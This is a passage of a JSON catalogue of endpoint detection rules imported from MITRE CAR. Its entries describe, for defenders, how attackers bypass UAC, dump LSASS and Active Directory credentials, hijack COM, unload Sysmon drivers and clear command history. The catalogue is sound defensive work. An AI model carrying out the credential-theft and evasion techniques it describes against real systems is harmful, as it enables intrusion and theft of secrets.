Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-005.yaml" } }, { "id": "mitre-car-car-2019-04-001", "type": "detection", "name": "UAC Bypass", "description": "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source [UACME](https://github.com/hfiref0x/UACME) tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-001.yaml" } }, { "id": "mitre-car-car-2019-04-002", "type": "detection", "name": "Generic Regsvr32", "description": "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. 
This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-002.yaml" } }, { "id": "mitre-car-car-2019-04-003", "type": "detection", "name": "Squiblydoo", "description": "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. 
It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.\n\nSquiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-003.yaml" } }, { "id": "mitre-car-car-2019-04-004", "type": "detection", "name": "Credential Dumping via Mimikatz", "description": "Credential dumpers like Mimikatz can be loaded into memory and from there read data from other processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are \u201covertuned\u201d to look for common access patterns used by Mimikatz.\n\n*This requires information about process access, e.g. Sysmon Event ID 10. That currently doesn\u2019t have a CAR data model mapping, since we currently lack any open/access actions for Processes. 
If this changes, we will update the data model requirements.*", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-04-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-04-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-04-004.yaml" } }, { "id": "mitre-car-car-2019-07-001", "type": "detection", "name": "Access Permission Modification", "description": "Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.\n\nNote - this analytic references file permissions, which are not currently in the CAR data model.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-07-001.yaml" } }, { "id": "mitre-car-car-2019-07-002", "type": "detection", "name": "Lsass Process Dump via Procdump", "description": 
"[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.\n\nProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name.\n\nNote - the CAR data model currently does not support process access actions, so the pseudocode implementation is based around process creates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-07-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-07-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-07-002.yaml" } }, { "id": "mitre-car-car-2019-08-001", "type": "detection", "name": "Credential Dumping via Windows Task Manager", "description": "The Windows Task Manager may be used to dump the memory space of `lsass.exe` to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting `lsass.exe`, and clicking \"Create dump file\". 
This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.\n\nThis requires filesystem data to determine whether files have been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-08-001.yaml" } }, { "id": "mitre-car-car-2019-08-002", "type": "detection", "name": "Active Directory Dumping via NTDSUtil", "description": "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching `ntdsutil.exe` as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. 
This process will create a copy of the Active Directory database, `ntds.dit`, to the specified folder path.\n\nThis requires filesystem data to determine whether files have been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2019-08-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2019-08-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2019-08-002.yaml" } }, { "id": "mitre-car-car-2020-05-001", "type": "detection", "name": "MiniDump of LSASS", "description": "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call [MiniDumpWriteDump](https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump). Tools like [SafetyKatz](https://github.com/GhostPack/SafetyKatz), [SafetyDump](https://github.com/m0rv4i/SafetyDump), and [Outflank-Dumpert](https://github.com/outflanknl/Dumpert) default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.\n\nThe analytic is based on a [Sigma analytic](https://github.com/NVISO-BE/sigma-public/blob/master/rules/windows/sysmon/sysmon_lsass_memdump.yml) contributed by Samir Bousseaden and written up in a [blog on MENASEC](https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html). It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. 
It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in [CAR-2019-08-001](/analytics/CAR-2019-08-001/). In this iteration of the Sigma analytic, the `GrantedAccess` filter isn't included because it didn't seem to filter out any false positives and introduces the potential for evasion.\n\nThis analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives.\n\nNOTE - this analytic has no corresponding pseudocode implementation because the CAR data model doesn't currently support process access events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-05-001.yaml" } }, { "id": "mitre-car-car-2020-05-003", "type": "detection", "name": "Rare LolBAS Command Lines", "description": "[LoLBAS](https://lolbas-project.github.io/) are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they're used (this would depend on your environment), but many others are very common and can't be simply alerted on.\n\nThis analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. 
This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.\n\nThe analytic needs to be tuned. The `1.5` in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long.\n\nNote - this analytic is related to [CAR-2013-04-002](/analytics/CAR-2013-04-002), but differs by looking for a different set of binaries and also looking at standard deviation across command lines of these binaries instead of their execution within a short time window.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1012", "T1112", "T1547", "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-05-003.yaml" } }, { "id": "mitre-car-car-2020-08-001", "type": "detection", "name": "NTFS Alternate Data Stream Execution - System Utilities", "description": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. 
ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-08-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-08-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-08-001.yaml" } }, { "id": "mitre-car-car-2020-08-002", "type": "detection", "name": "NTFS Alternate Data Stream Execution - LOLBAS", "description": "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. 
ADSs are also powerful because their contents can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using Living off the Land Binaries and Scripts (LOLBAS).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-08-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-08-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-08-002.yaml" } }, { "id": "mitre-car-car-2020-09-001", "type": "detection", "name": "Scheduled Task - FileAccess", "description": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\\Windows\\Tasks (legacy) or C:\\Windows\\System32\\Tasks. 
Accordingly, this analytic looks for the creation of task files in these two locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-001.yaml" } }, { "id": "mitre-car-car-2020-09-002", "type": "detection", "name": "Component Object Model Hijacking", "description": "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\\Software\\Classes\\CLSID or HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID keys. 
Accordingly, this analytic looks for any changes under these keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-002.yaml" } }, { "id": "mitre-car-car-2020-09-003", "type": "detection", "name": "Indicator Blocking - Driver Unloaded", "description": "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-003.yaml" } }, { "id": "mitre-car-car-2020-09-004", "type": "detection", "name": "Credentials in Files & Registry", "description": "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. 
This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as \"password\". In addition, adversaries may use toolkits such as [PowerSploit](https://powersploit.readthedocs.io/en/latest/) in order to dump credentials from various applications such as IIS. Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several PowerSploit modules with similar functionality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-004.yaml" } }, { "id": "mitre-car-car-2020-09-005", "type": "detection", "name": "AppInit DLLs", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys `HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows` or `HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows` are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. 
Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-09-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-09-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-09-005.yaml" } }, { "id": "mitre-car-car-2020-11-001", "type": "detection", "name": "Boot or Logon Initialization Scripts", "description": "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\\Environment*UserInitMprLogonScript*. This signature looks for edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. 
Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1037" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-001.yaml" } }, { "id": "mitre-car-car-2020-11-002", "type": "detection", "name": "Local Network Sniffing", "description": "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. 
While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-002.yaml" } }, { "id": "mitre-car-car-2020-11-003", "type": "detection", "name": "DLL Injection with Mavinject", "description": "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it rolls up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument \"INJECTRUNNING\" as a related signature here. 
Whitelisting certain applications may be necessary to reduce noise for this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-003.yaml" } }, { "id": "mitre-car-car-2020-11-004", "type": "detection", "name": "Processes Started From Irregular Parent", "description": "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discrepancy. 
These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-004.yaml" } }, { "id": "mitre-car-car-2020-11-005", "type": "detection", "name": "Clear Powershell Console Command History", "description": "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the Powershell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only commandline-based commands are detected. 
Note that the command to remove the history file directly may vary a bit if the history file is not saved in the default path on a particular system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-005.yaml" } }, { "id": "mitre-car-car-2020-11-006", "type": "detection", "name": "Local Permission Group Discovery", "description": "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. 
This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1069" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-006.yaml" } }, { "id": "mitre-car-car-2020-11-007", "type": "detection", "name": "Network Share Connection Removal", "description": "Adversaries may use network shares to exfiltrate data; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via commandline, which is otherwise a rare event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-007.yaml" } }, { "id": "mitre-car-car-2020-11-008", "type": "detection", "name": "MSBuild and msxsl", "description": "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. 
This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variety of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-008.yaml" } }, { "id": "mitre-car-car-2020-11-009", "type": "detection", "name": "Compiled HTML Access", "description": "Adversaries may hide malicious code in .chm compiled HTML files. 
When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-009.yaml" } }, { "id": "mitre-car-car-2020-11-010", "type": "detection", "name": "CMSTP", "description": "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to set up listeners that will receive and install malware from remote sources in trusted fashion.\nWhen CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-010.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-010", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-010.yaml" } }, { "id": "mitre-car-car-2020-11-011", "type": "detection", "name": "Registry Edit from Screensaver", "description": "Adversaries may use screensaver files to run malicious code. 
This analytic triggers on suspicious edits to the screensaver registry keys, which dictate which .scr file the screensaver runs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2020-11-011.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2020-11-011", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2020-11-011.yaml" } }, { "id": "mitre-car-car-2021-01-001", "type": "detection", "name": "Identifying Port Scanning Activity", "description": "After compromising an initial machine, adversaries commonly attempt to laterally move across the network. The first step to attempt the lateral movement often involves conducting host identification, port and service scans on the internal network via the compromised machine using tools such as Nmap, Cobalt Strike, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-001.yaml" } }, { "id": "mitre-car-car-2021-01-002", "type": "detection", "name": "Unusually Long Command Line Strings", "description": 